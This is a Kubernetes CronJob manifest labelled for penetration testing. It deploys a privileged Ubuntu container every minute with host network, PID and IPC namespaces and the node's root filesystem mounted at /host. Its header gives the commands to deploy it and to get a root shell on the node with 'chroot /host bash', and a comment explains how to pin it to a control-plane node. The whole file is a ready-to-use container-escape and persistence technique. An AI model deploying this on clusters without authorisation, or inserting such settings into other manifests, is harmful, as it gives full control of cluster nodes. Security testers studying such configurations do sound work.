###########################################################
## Deploy:   kubectl apply -f everything-allowed-exec-cronjob.yaml
## Find Pod: kubectl get pods | grep everything-allowed-exec-cronjob 
## Access:   kubectl exec -it everything-allowed-exec-cronjob-ID -- chroot /host bash
## Remove:   kubectl delete cronjob everything-allowed-exec-cronjob
###########################################################

apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: everything-allowed-exec-cronjob
  labels:
    app: pentest
    type: cronjob
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          hostNetwork: true
          hostPID: true
          hostIPC: true
          containers:
          - name: everything-allowed-exec-cronjob
            image: ubuntu
            securityContext:
              privileged: true
            volumeMounts:
            - mountPath: /host
              name: noderoot
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "while true; do sleep 30; done;" ]
          #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
          volumes:
          - name: noderoot
            hostPath:
              path: /
          restartPolicy: OnFailure
